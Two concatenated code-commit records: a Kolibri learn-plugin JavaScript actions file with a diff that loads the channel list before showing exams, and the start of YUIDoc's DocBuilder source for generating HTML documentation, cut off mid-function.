handleApiError(store, error); } ); } function showTopicsChannel(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); showTopicsTopic(store, id, true); } function showTopicsContent(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CONTENT); const contentPromise = ContentNodeResource.getModel(id).fetch(); const nextContentPromise = ContentNodeResource.fetchNextContent(id); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([ contentPromise, channelsPromise, nextContentPromise, ancestorsPromise, ]).only( samePageCheckGenerator(store), ([content, channels, nextContent, ancestors]) => { const currentChannel = getChannelObject(store.state, content.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { content: contentState(content, nextContent, ancestors), channel: currentChannel, }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentContentForChannelPageTitle', { currentContentTitle: pageState.content.title, currentChannelTitle: currentChannel.title, }) ); }, error => { handleApiError(store, error); } ); } function triggerSearch(store, searchTerm) { if (!searchTerm) { const searchState = { searchTerm, topics: [], contents: [], }; store.dispatch('SET_PAGE_STATE', searchState); return; } const contentCollection = ContentNodeResource.getPagedCollection({ search: searchTerm }); const searchResultsPromise = contentCollection.fetch(); searchResultsPromise .then(results => { const searchState = { searchTerm }; searchState.contents = _collectionState(results); store.dispatch('SET_PAGE_STATE', searchState); store.dispatch('CORE_SET_PAGE_LOADING', false); }) .catch(error => { handleApiError(store, error); }); } function clearSearch(store) { store.dispatch('SET_PAGE_STATE', { topics: [], contents: [], searchTerm: '', }); } function showContentUnavailable(store) { store.dispatch('SET_PAGE_NAME', PageNames.CONTENT_UNAVAILABLE); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); 
store.dispatch('CORE_SET_TITLE', translator.$tr('contentUnavailablePageTitle')); } function showSearch(store, searchTerm) { store.dispatch('SET_PAGE_NAME', PageNames.SEARCH); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('searchPageTitle')); clearSearch(store); setAndCheckChannels(store).then(channels => { if (!channels.length) { return; } if (searchTerm) { triggerSearch(store, searchTerm); } else { store.dispatch('CORE_SET_PAGE_LOADING', false); } }); } function showExamList(store) { const userIsLoggedIn = isUserLoggedIn(store.state); store.dispatch('SET_PAGE_NAME', PageNames.EXAM_LIST); store.dispatch('CORE_SET_PAGE_LOADING', true); // if user is not logged in, this action is a noop if (!userIsLoggedIn) { store.dispatch('CORE_SET_PAGE_LOADING', false); return Promise.resolve(); } return UserExamResource.getCollection().fetch().only( samePageCheckGenerator(store), exams => { const pageState = {}; pageState.exams = exams.map(_examState); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('examsListPageTitle')); }, error => { handleApiError(store, error); } ); } function calcQuestionsAnswered(attemptLogs) { let questionsAnswered = 0; Object.keys(attemptLogs).forEach(key => { Object.keys(attemptLogs[key]).forEach(innerKey => { questionsAnswered += attemptLogs[key][innerKey].answer ? 1 : 0; }); }); return questionsAnswered; } function showExam(store, id, questionNumber) { if (store.state.pageName !== PageNames.EXAM) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.EXAM); } if (!store.state.core.session.user_id) { store.dispatch('CORE_SET_ERROR', 'You must be logged in as a learner to view this page'); store.dispatch('CORE_SET_PAGE_LOADING', false); } else { questionNumber = Number(questionNumber); // eslint-disable-line no-param-reassign const examPromise = UserExamResource.getModel(id).fetch(); const examLogPromise = ExamLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); const examAttemptLogPromise = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); ConditionalPromise.all([examPromise, examLogPromise, examAttemptLogPromise]).only( samePageCheckGenerator(store), ([exam, examLogs, examAttemptLogs]) => { const currentChannel = getChannelObject(store.state, exam.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const attemptLogs = {}; if (store.state.core.session.user_id) { if (examLogs.length > 0 && examLogs.some(log => !log.closed)) { store.dispatch('SET_EXAM_LOG', _examLoggingState(examLogs.find(log => !log.closed))); } else { const examLogModel = ExamLogResource.createModel({ user: store.state.core.session.user_id, exam: id, closed: false, }); examLogModel.save().then(newExamLog => { store.dispatch('SET_EXAM_LOG', newExamLog); ExamLogResource.unCacheCollection({ user: store.state.core.session.user_id, exam: id, }); }); } // Sort through all the exam attempt logs retrieved and organize them into objects // keyed first by content_id and then item id under that. 
if (examAttemptLogs.length > 0) { examAttemptLogs.forEach(log => { if (!attemptLogs[log.content_id]) { attemptLogs[log.content_id] = {}; } attemptLogs[log.content_id][log.item] = Object.assign({}, log); }); } } const seed = exam.seed; const questionSources = exam.question_sources; // Create an array of objects with contentId and assessmentItemIndex // These will be used to select specific questions from the content node // The indices referred to shuffled positions in the content node's assessment_item_ids // property. // Wrap this all in a seededShuffle to give a consistent, repeatable shuffled order. const shuffledQuestions = seededShuffle.shuffle( createQuestionList(questionSources), seed, true ); if (!shuffledQuestions[questionNumber]) { // Illegal question number! handleError(store, `Question number ${questionNumber} is not valid for this exam`); } else { const contentPromise = ContentNodeResource.getCollection({ ids: questionSources.map(item => item.exercise_id), }).fetch(); contentPromise.only( samePageCheckGenerator(store), contentNodes => { const contentNodeMap = {}; contentNodes.forEach(node => { contentNodeMap[node.pk] = node; }); const questions = shuffledQuestions.map(question => ({ itemId: selectQuestionFromExercise( question.assessmentItemIndex, seed, contentNodeMap[question.contentId] ), contentId: question.contentId, })); if (questions.every(question => !question.itemId)) { // Exam is drawing solely on malformed exercise data, best to quit now handleError(store, `This exam has no valid questions`); } else { const itemId = questions[questionNumber].itemId; const channelId = exam.channel_id; const currentQuestion = questions[questionNumber]; const questionsAnswered = Math.max( store.state.pageState.questionsAnswered || 0, calcQuestionsAnswered(attemptLogs) ); const pageState = { exam: _examState(exam), itemId, questions, currentQuestion, questionNumber, content: contentState(contentNodeMap[questions[questionNumber].contentId]), channelId, questionsAnswered, }; if (!attemptLogs[currentQuestion.contentId]) { attemptLogs[currentQuestion.contentId] = {}; } if (!attemptLogs[currentQuestion.contentId][itemId]) { attemptLogs[currentQuestion.contentId][itemId] = { start_timestamp: now(), completion_timestamp: null, end_timestamp: null, item: itemId, complete: false, time_spent: 0, correct: 0, answer: null, simple_answer: '', interaction_history: [], hinted: false, channel_id: channelId, content_id: currentQuestion.contentId, }; } pageState.currentAttempt = attemptLogs[currentQuestion.contentId][itemId]; store.dispatch('SET_EXAM_ATTEMPT_LOGS', attemptLogs); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentExamPageTitle', { currentExamTitle: pageState.exam.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } }, error => { handleApiError(store, error); } ); } } function setAndSaveCurrentExamAttemptLog(store, contentId, itemId, currentAttemptLog) { // As soon as this has happened, we should clear any previous cache for the // UserExamResource - as that data has now changed. 
UserExamResource.clearCache(); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: currentAttemptLog, }), }); const pageState = Object.assign(store.state.pageState); pageState.currentAttempt = currentAttemptLog; store.dispatch('SET_PAGE_STATE', pageState); // If a save has already been fired for this particular attempt log, // it may not have an id yet, so we can look for it by its uniquely // identifying fields, contentId and itemId. let examAttemptLogModel = ExamAttemptLogResource.findModel({ content_id: contentId, item: itemId, }); const attributes = Object.assign({}, currentAttemptLog); attributes.user = store.state.core.session.user_id; attributes.examlog = store.state.examLog.id; // If the above findModel returned no matching model, then we can do // getModel to get the new model instead. if (!examAttemptLogModel) { examAttemptLogModel = ExamAttemptLogResource.createModel(attributes); } const promise = examAttemptLogModel.save(attributes); return promise.then( newExamAttemptLog => new Promise((resolve, reject) => { const log = Object.assign({}, newExamAttemptLog); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: log, }), }); const questionsAnswered = calcQuestionsAnswered(store.state.examAttemptLogs); store.dispatch('SET_QUESTIONS_ANSWERED', questionsAnswered); const examAttemptLogCollection = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: store.state.pageState.exam.id, }); // Add this attempt log to the Collection for future caching. examAttemptLogCollection.set(examAttemptLogModel); resolve(); }) ); } function closeExam(store) { const examLog = Object.assign({}, store.state.examLog); examLog.closed = true; return ExamLogResource.getModel(examLog.id).save(examLog).catch(error => { handleApiError(store, error); }); } export { setAndCheckChannels, contentState, showChannels, showTopicsChannel, showTopicsTopic, showTopicsContent, showContentUnavailable, triggerSearch, clearSearch, showSearch, showExam, showExamList, setAndSaveCurrentExamAttemptLog, closeExam, prepareLearnApp, updateContentNodeProgress, };
Bootstrap channel list when entering exams page
kolibri/plugins/learn/assets/src/state/actions/main.js
Bootstrap channel list when entering exams page
<ide><path>kolibri/plugins/learn/assets/src/state/actions/main.js <ide> import { <ide> ContentNodeResource, <ide> ContentNodeProgressResource, <del> SessionResource, <ide> UserExamResource, <ide> ExamLogResource, <ide> ExamAttemptLogResource, <ide> } from 'kolibri.resources'; <ide> <ide> import { getChannelObject, isUserLoggedIn } from 'kolibri.coreVue.vuex.getters'; <del>import { setChannelInfo, handleApiError } from 'kolibri.coreVue.vuex.actions'; <add>import { <add> setChannelInfo, <add> handleApiError, <add> samePageCheckGenerator, <add>} from 'kolibri.coreVue.vuex.actions'; <ide> import { createQuestionList, selectQuestionFromExercise } from 'kolibri.utils.exams'; <ide> import { ContentNodeKinds } from 'kolibri.coreVue.vuex.constants'; <ide> import { PageNames } from '../../constants'; <del>import { samePageCheckGenerator } from 'kolibri.coreVue.vuex.actions'; <ide> import { assessmentMetaDataState } from 'kolibri.coreVue.vuex.mappers'; <ide> import { now } from 'kolibri.utils.serverClock'; <ide> <ide> user: store.state.core.session.user_id, <ide> exam: id, <ide> }).fetch(); <del> ConditionalPromise.all([examPromise, examLogPromise, examAttemptLogPromise]).only( <add> ConditionalPromise.all([ <add> examPromise, <add> examLogPromise, <add> examAttemptLogPromise, <add> setAndCheckChannels(store), <add> ]).only( <ide> samePageCheckGenerator(store), <ide> ([exam, examLogs, examAttemptLogs]) => { <ide> const currentChannel = getChannelObject(store.state, exam.channel_id);
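The diff above folds setAndCheckChannels(store) into the ConditionalPromise.all that already gates showExam, so the channel list is fetched, and the user is redirected to the content-unavailable page when it is empty, before getChannelObject is asked for exam.channel_id. Stripped of Kolibri's ConditionalPromise wrapper, the underlying idea is simply to gate a page handler on all of its asynchronous prerequisites at once; the sketch below illustrates that with plain promises. fetchExam, fetchChannels, showUnavailable, renderExam and reportError are hypothetical helpers used only for illustration and are not part of the record above.

// Simplified sketch of gating a page on several async prerequisites.
// All helper functions here are hypothetical placeholders.
function showExamPage(store, examId) {
  return Promise.all([fetchExam(examId), fetchChannels()])
    .then(([exam, channels]) => {
      if (!channels.length) {
        // Nothing imported yet: bail out before any channel lookup runs.
        return showUnavailable(store);
      }
      const channel = channels.find(c => c.id === exam.channel_id);
      return renderExam(store, exam, channel);
    })
    .catch(err => reportError(store, err));
}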
JavaScript
bsd-3-clause
d9e8f2afa57168f2595e671cde67529fc56d0528
0
greyhwndz/yuidoc,mborman/yuidoc-asp,naver/auidoc,okuryu/yuidoc,Tetpay/yuidoc,regru/yuidoc,mixonic/yuidoc,mborman/yuidoc-asp,fireball-x/firedoc,naver/auidoc,mixonic/yuidoc,okuryu/yuidoc,greyhwndz/yuidoc,mborman/yuidoc-asp,regru/yuidoc,okuryu/yuidoc,mixonic/yuidoc,greyhwndz/yuidoc,fireball-x/firedoc,Tetpay/yuidoc,fireball-x/firedoc,naver/auidoc,regru/yuidoc
/* Copyright (c) 2011, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://yuilibrary.com/license/ */ var MD = require("node-markdown").Markdown, fs = require('graceful-fs'), noop = function() {}, path = require('path'), DEFAULT_RETURN_TAGS = 'code|em|strong|span|a|pre|dl|dd|dt|ul|li|ol', TEMPLATE, /** * Takes a type string and converts it to a "First letter upper cased" type. e.g. `(string -> String, object -> Object)` * @method fixType * @private * @param {String} t The type string to convert * @return {String} The fixed string */ fixType = function(t) { var firstChar = t.charAt(0), upperFirstChar = firstChar.toUpperCase(); if (firstChar !== upperFirstChar) { return upperFirstChar + t.substring(1); } return t; }, /** * Wrapper around the Markdown parser so it can be normalized or even side stepped * @method markdown * @private * @param {String} md The Markdown string to parse * @param {Boolean} def Only allow default set of HTML tags * @param {Array} tags An array of tags to allow * @return {HTML} The rendered HTML */ markdown = function(md, def, tags) { html = MD(md, def, tags); return html; }; /** * Takes the `JSON` data from the `DocParser` class, creates and parses markdown and handlebars based templates to generate static HTML content * @class DocBuilder * @module yuidoc */ YUI.add('doc-builder', function(Y) { var print = function(items) { var out = '<ul>'; Y.each(items, function(i, k) { out += '<li>'; if (Y.Lang.isObject(i)) { if (!i.path) { out += k + '/' + print(i); } else { out += '<a href="../files/' + i.name + '.html">' + k + '</a>'; } } out += '</li>'; }); out += '</ul>'; return out; }; Y.Handlebars.registerHelper('buildFileTree', function(items, fn) { return print(items); }); var DEFAULT_THEME = themeDir = path.join(__dirname, '../', 'themes', 'default'); Y.DocBuilder = function(options, data) { this.options = options; if (options.themedir) { themeDir = options.themedir; } this.data = data; Y.log('Building..', 'info', 'builder'); this.files = 0; var self = this; Y.Handlebars.registerHelper('crossLink', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item); } return str; }); Y.Handlebars.registerHelper('crossLinkModule', function(item, fn) { var str = item; if (self.data.modules[item]) { str = '<a href="../modules/' + item + '.html">' + item + '</a>'; } return str; }); Y.Handlebars.registerHelper('crossLinkRaw', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i, true)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item, true); } return str; }); this.cacheTemplates = true; if (options.cacheTemplates === false) { this.cacheTemplates = false; } }; Y.DocBuilder.prototype = { _parseCrossLink: function(item, raw) { item = fixType(item); var self = this; var base = '../', baseName = item, newWin = false, className = 'crosslink'; item = baseItem = Y.Lang.trim(item.replace('{', '').replace('}', '')); //Remove Cruft item = item.replace('*', '').replace('[', '').replace(']', ''); var link = false, href; if (self.data.classes[item]) { link = true; } else { if (self.data.classes[item.replace('.', '')]) { link = true; item = item.replace('.', ''); } } if 
(self.options.externalData) { if (self.data.classes[item]) { if (self.data.classes[item].external) { href = self.data.classes[item].path; base = self.options.externalData.base; className += ' external'; newWin = true; link = true; } } } /* if (!link && self.options.externalData) { var d = self.options.externalData; if (d && d.classes[item]) { href = d.classes[item].path; base = d.base; className += ' external'; newWin = true; link = true; } } */ if (item === 'Object' || item === 'Array') { link = false; } if (!href) { href = path.join(base, 'classes', item + '.html'); if (base.match(/^https?:\/\//)) { href = base + path.join('classes', item + '.html'); } } if (!link && self.options.linkNatives) { if (self.NATIVES && self.NATIVES[item]) { href = self.NATIVES_LINKER(item); if (href) { className += ' external'; newWin = true; link = true; } } } if (link) { item = '<a href="' + href + '" class="' + className + '"' + ((newWin) ? ' target="_blank"' : '') + '>' + baseItem + '</a>'; } return (raw) ? href : item; }, NATIVES: { 'Array': 1, 'Boolean': 1, 'Date': 1, 'decodeURI': 1, 'decodeURIComponent': 1, 'encodeURI': 1, 'encodeURIComponent': 1, 'eval': 1, 'Error': 1, 'EvalError': 1, 'Function': 1, 'Infinity': 1, 'isFinite': 1, 'isNaN': 1, 'Math': 1, 'NaN': 1, 'Number': 1, 'Object': 1, 'parseFloat': 1, 'parseInt': 1, 'RangeError': 1, 'ReferenceError': 1, 'RegExp': 1, 'String': 1, 'SyntaxError': 1, 'TypeError': 1, 'undefined': 1, 'URIError': 1, 'HTMLElement': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLCollection': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'DocumentFragment': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLDocument': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/' }, NATIVES_LINKER: function(name) { var url = 'https:/'+'/developer.mozilla.org/en/JavaScript/Reference/Global_Objects/'; if (this.NATIVES[name] !== 1) { url = this.NATIVES[name]; } return url + name; }, _mixExternal: function() { var self = this; Y.log('External data received, mixing', 'info', 'builder'); var exData = self.options.externalData; ['files', 'classes', 'modules'].forEach(function(k) { Y.each(exData[k], function(item, key) { item.external = true; var file = item.name; if (!item.file) { file = self.filterFileName(item.name); } item.path = exData.base + path.join(k, file + '.html'); self.data[k][key] = item; }); }); Y.each(exData.classitems, function(item) { item.external = true; item.path = exData.base + path.join('files', self.filterFileName(item.file) + '.html'); self.data.classitems.push(item); }); }, mixExternal: function(cb) { var self = this, info = self.options.external; if (!info) { cb(); return; } if (!info.merge) { info.merge = 'mix'; } if (!info.data) { Y.log('External config found but no data path defined, skipping import.', 'warn', 'builder'); cb(); return; } if (!Y.Lang.isArray(info.data)) { info.data = [ info.data ]; } Y.log('Importing external documentation data.', 'info', 'builder'); var stack = new Y.Parallel(); info.data.forEach(function(i) { var base; if (i.match(/^https?:\/\//)) { base = i.replace('data.json', ''); Y.use('io-base', stack.add(function() { Y.io(i, { on: { complete: stack.add(function(id, e) { var data = JSON.parse(e.responseText); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); }) } }); })); } else { base = path.dirname(path.resolve(i)); var data = Y.Files.getJSON(i); data.base = base; self.options.externalData = 
Y.mix(self.options.externalData || {}, data); } }); stack.done(function() { Y.log('Finished fetching remote data', 'info', 'builder'); self._mixExternal(); cb(); }); }, /** * The default tags to use in params descriptions (for Markdown). * @property defaultTags * @type String */ defaultReturnTags: DEFAULT_RETURN_TAGS, defaultTags: 'p|' + DEFAULT_RETURN_TAGS, /** * File counter * @property files * @type Number */ files: null, /** * Prep the meta data to be fed to Selleck * @method getProjectMeta * @return {Object} The project metadata */ _meta: null, getProjectMeta: function() { var obj = { meta: { yuiSeedUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/yui/yui-min.js', yuiGridsUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/cssgrids/cssgrids-min.css' } }; if (!this._meta) { try { var meta; if (fs.existsSync(path.join(themeDir, 'theme.json'))) { meta = Y.Files.getJSON(path.join(themeDir, 'theme.json')); } else if (DEFAULT_THEME !== themeDir) { if (fs.existsSync(path.join(DEFAULT_THEME))) { meta = Y.Files.getJSON(path.join(DEFAULT_THEME, 'theme.json')); } } if (meta) { obj.meta = meta; this._meta = meta; } } catch (e) {} } else { obj.meta = this._meta; } Y.each(this.data.project, function(v, k) { var key = k.substring(0, 1).toUpperCase() + k.substring(1, k.length); obj.meta['project' + key] = v; }); return obj }, /** * Populate the meta data for classes * @method populateClasses * @param {Object} opts The original options * @return {Object} The modified options */ populateClasses: function(opts) { opts.meta.classes = []; Y.each(this.data.classes, function(v) { if (v.external) { return } opts.meta.classes.push({ displayName: v.name, name: v.name}); }); opts.meta.classes.sort(this.nameSort); return opts; }, /** * Populate the meta data for modules * @method populateModules * @param {Object} opts The original options * @return {Object} The modified options */ populateModules: function(opts) { var self = this; opts.meta.modules = []; opts.meta.allModules = []; Y.each(this.data.modules, function(v) { if (v.external) { return } opts.meta.allModules.push({ displayName: v.displayName || v.name, name: self.filterFileName(v.name), description: v.description }); if (!v.is_submodule) { var o = { displayName: v.displayName || v.name, name: self.filterFileName(v.name) }; if (v.submodules) { o.submodules = []; Y.each(v.submodules, function(i, k) { moddef = self.data.modules[k]; if (moddef) { o.submodules.push({ displayName: k, description: moddef.description }); } else { //Y.log('Submodule data missing: ' + k + ' for ' + v.name, 'warn', 'builder'); } }); o.submodules.sort(self.nameSort); } opts.meta.modules.push(o); } }); opts.meta.modules.sort(this.nameSort); opts.meta.allModules.sort(this.nameSort); return opts; }, /** * Populate the meta data for files * @method populateFiles * @param {Object} opts The original options * @return {Object} The modified options */ populateFiles: function(opts) { var self = this; opts.meta.files = []; Y.each(this.data.files, function(v) { if (v.external) { return } opts.meta.files.push({ displayName: v.name, name: self.filterFileName(v.name), path: v.path || v.name }); }); var tree = {}; var files = []; Y.each(this.data.files, function(v) { if (v.external) { return } files.push(v.name); }); files.sort(); Y.each(files, function(v) { var p = v.split('/'), par; p.forEach(function(i, k) { if (!par) { if (!tree[i]) { tree[i] = {}; } par = tree[i]; } else { if (!par[i]) { par[i] = {}; } if (k + 1 === p.length) { par[i] = { path: v, name: self.filterFileName(v) }; } par = par[i]; } }); 
}); opts.meta.fileTree = tree; return opts; }, addFoundAt: function(a) { var self = this; if (a.file && a.line && !self.options.nocode) { a.foundAt = '../files/' + self.filterFileName(a.file) + '.html#l' + a.line; if (a.path) { a.foundAt = a.path + '#l' + a.line; } } return a; }, /** * Augments the **DocParser** meta data to provide default values for certain keys as well as parses all descriptions * with the `Markdown Parser` * @method augmentData * @param {Object} o The object to recurse and augment * @return {Object} The augmented object */ augmentData: function(o) { var self = this; o = self.addFoundAt(o); Y.each(o, function(i, k1) { if (i && i.forEach) { Y.each(i, function(a, k) { if (!(a instanceof Object)) { return; } if (!a.type) { a.type = 'Object'; //Default type is Object } if (a.final === '') { a.final = true; } if (!a.description) { a.description = ' '; } else { a.description = markdown(a.description, true, self.defaultTags); } if (a.example) { a.example = markdown(a.example, true, self.defaultTags); } a = self.addFoundAt(a); Y.each(a, function(c, d) { if (c.forEach || (c instanceof Object)) { c = self.augmentData(c); a[d] = c; } }); o[k1][k] = a; }); } else if (i instanceof Object) { i = self.addFoundAt(i); Y.each(i, function(v, k) { if (k === 'final') { o[k1][k] = true; } if (k === 'description' || k === 'example') { if (k1 === 'return') { o[k1][k] = markdown(v, true, self.defaultReturnTags); } else if (v.forEach || (v instanceof Object)) { o[k1][k] = self.augmentData(v); } else { o[k1][k] = markdown(v, true, self.defaultTags); } } }); } else if (k1 === 'description' || k1 === 'example') { o[k1] = markdown(i, true, self.defaultTags); } }); return o; }, /** * Makes the default directories needed * @method makeDirs * @param {Callback} cb The callback to execute after it's completed */ makeDirs: function(cb) { var self = this; var dirs = ['classes', 'modules', 'files']; if (self.options.dumpview) { dirs.push('json'); } var writeRedirect = function(dir, file, cb) { path.exists(file, function(x) { if (x) { var out = path.join(dir, 'index.html'); fs.createReadStream(file).pipe(fs.createWriteStream(out)); } cb(); }); }; var defaultIndex = path.join(themeDir, 'assets', 'index.html'); var stack = new Y.Parallel(); Y.log('Making default directories: ' + dirs.join(','), 'info', 'builder'); dirs.forEach(function(d) { var dir = path.join(self.options.outdir, d); path.exists(dir, stack.add(function(x) { if (!x) { fs.mkdir(dir, 0777, stack.add(function() { writeRedirect(dir, defaultIndex, stack.add(noop)); })); } else { writeRedirect(dir, defaultIndex, stack.add(noop)); } })); }); stack.done(function() { if (cb) { cb(); } }); }, /** * Parses `<pre><code>` tags and adds the __prettyprint__ `className` to them * @method _parseCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _parseCode: function (html) { html = html || ''; html = html.replace(/<pre><code>/g, '<pre class="code"><code class="prettyprint">'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck), this handles ```'s in fields that are not parsed by the **Markdown** parser. 
* @method _inlineCode * @private * @param {HTML} html The HTML to parse * @return {HTML} The parsed HTML */ _inlineCode: function(html) { html = html.replace(/\\`/g, '__{{SELLECK_BACKTICK}}__'); html = html.replace(/`(.+?)`/g, function (match, code) { return '<code>' + Y.escapeHTML(code) + '</code>'; }); html = html.replace(/__\{\{SELLECK_BACKTICK\}\}__/g, '`'); return html; }, /** * Ported from [Selleck](https://github.com/rgrove/selleck) Renders the handlebars templates with the default View class. * @method render * @param {HTML} source The default template to parse * @param {Class} view The default view handler * @param {HTML} [layout=null] The HTML from the layout to use. * @param {Object} [partials=object] List of partials to include in this template * @param {Callback} callback * @param {Error} callback.err * @param {HTML} callback.html The assembled template markup */ render: function(source, view, layout, partials, callback) { var html = []; function buffer(line) { html.push(line); } // Allow callback as third or fourth param. if (typeof partials === 'function') { callback = partials; partials = {}; } else if (typeof layout === 'function') { callback = layout; layout = null; } var parts = Y.merge(partials || {}, { layout_content: source }); Y.each(parts, function(source, name) { Y.Handlebars.registerPartial(name, source); }); if (!TEMPLATE || !this.cacheTemplates) { TEMPLATE = Y.Handlebars.compile(layout); } var _v = {}; for (var k in view) { if (Y.Lang.isFunction(view[k])) { _v[k] = view[k](); } else { _v[k] = view[k]; } }; html = TEMPLATE(_v); html = this._inlineCode(html); callback(null, html); }, /** * Render the index file * @method renderIndex * @param {Function} cb The callback fired when complete * @param {String} cb.html The HTML to render this view * @param {Object} cv.view The View Data */ renderIndex: function(cb) { var self = this; Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta.title = self.data.project.name; opts.meta.projectRoot = './'; opts.meta.projectAssets = './assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); var view = new Y.DocView(opts.meta); self.render('{{>index}}', view, opts.layouts.main, opts.partials, function(err, html) { self.files++; cb(html, view); }); }); }, /** * Generates the index.html file * @method writeIndex * @param {Callback} cb The callback to execute after it's completed */ writeIndex: function(cb) { var self = this, stack = new Y.Parallel(); Y.log('Preparing index.html', 'info', 'builder'); self.renderIndex(stack.add(function(html, view) { stack.html = html; stack.view = view; if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'index.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'index.html'), html, stack.add(noop)); })); stack.done(function(html, view) { Y.log('Writing index.html', 'info', 'builder'); cb(stack.html, stack.view); }); }, renderModule: function(cb, data, layout) { var self = this; var stack = new Y.Parallel(); data.displayName = data.name; data.name = self.filterFileName(data.name); Y.prepare([DEFAULT_THEME, themeDir], self.getProjectMeta(), function(err, opts) { opts.meta = Y.merge(opts.meta, data); //opts.meta.htmlTitle = v.name + ': ' + self.data.project.name; opts.meta.title = self.data.project.name; opts.meta.moduleName = data.displayName || data.name; opts.meta.moduleDescription = self._parseCode(markdown(data.description || ' ')); opts.meta.file = 
data.file; opts.meta.line = data.line; opts.meta = self.addFoundAt(opts.meta); opts.meta.projectRoot = '../'; opts.meta.projectAssets = '../assets'; opts = self.populateClasses(opts); opts = self.populateModules(opts); opts = self.populateFiles(opts); if (data.classes && Object.keys(data.classes).length) { opts.meta.moduleClasses = []; Y.each(Object.keys(data.classes), function(name) { var i = self.data.classes[name]; if (i) { opts.meta.moduleClasses.push({ name: i.name, displayName: i.name }); } }); opts.meta.moduleClasses.sort(self.nameSort); } if (data.submodules && Object.keys(data.submodules).length) { opts.meta.subModules = []; Y.each(Object.keys(data.submodules), function(name) { var i = self.data.modules[name]; if (i) { opts.meta.subModules.push({ name: i.name, displayName: i.name, description: i.description }); } }); opts.meta.subModules.sort(self.nameSort); } var view = new Y.DocView(opts.meta); var mainLayout = opts.layouts[layout]; self.render('{{>module}}', view, mainLayout, opts.partials, stack.add(function(err, html) { self.files++; stack.html = html; stack.view = view; })); }); stack.done(function() { cb(stack.html, stack.view); }); }, /** * Generates the module files under "out"/modules/ * @method writeModules * @param {Callback} cb The callback to execute after it's completed */ writeModules: function(cb, layout) { layout = layout || 'main'; var self = this, stack = new Y.Parallel(); stack.html = []; stack.view = []; Y.log('Rendering and writing ' + Object.keys(self.data.modules).length + ' modules pages.', 'info', 'builder'); Y.each(self.data.modules, function(v) { if (v.external) { return } self.renderModule(function(html, view) { stack.html.push(html); stack.view.push(view); if (self.options.dumpview) { Y.Files.writeFile(path.join(self.options.outdir, 'json', 'module_' + v.name + '.json'), JSON.stringify(view), stack.add(noop)); } Y.Files.writeFile(path.join(self.options.outdir, 'modules', v.name + '.html'), html, stack.add(noop)); }, v, layout); }); stack.done(function() { Y.log('Finished writing module files', 'info', 'builder'); cb(stack.html, stack.view); }); }, hasProperty: function(a, b) { var other; var h = Y.some(a, function(i, k) { if ((i.itemtype === b.itemtype) && (i.name === b.name)) { other = k; return true; } }); return other; }, mergeExtends: function(info, classItems) { var self = this; if (info.extends || info.uses) { var hasItems = {}; hasItems[info.extends] = 1; if (info.uses) { info.uses.forEach(function(v) { hasItems[v] = 1; }); } self.data.classitems.forEach(function(v) { //console.error(v.class, '==', info.extends); if (hasItems[v.class]) { if (!v.static) { var override = self.hasProperty(classItems, v); if (!override) { //This method was extended from the parent class but not over written //console.error('Merging extends from', v.class, 'onto', info.name); var q = Y.merge({}, v); q.extended_from = v.class; classItems.push(q); } else { //This method was extended from the parent and overwritten in this class var q = Y.merge({}, v); q = self.augmentData(q); classItems[override].overwritten_from = q; } } } }); if (self.data.classes[info.extends]) { if (self.data.classes[info.extends].extends || self.data.classes[info.extends].uses) { //console.error('Stepping down to:', 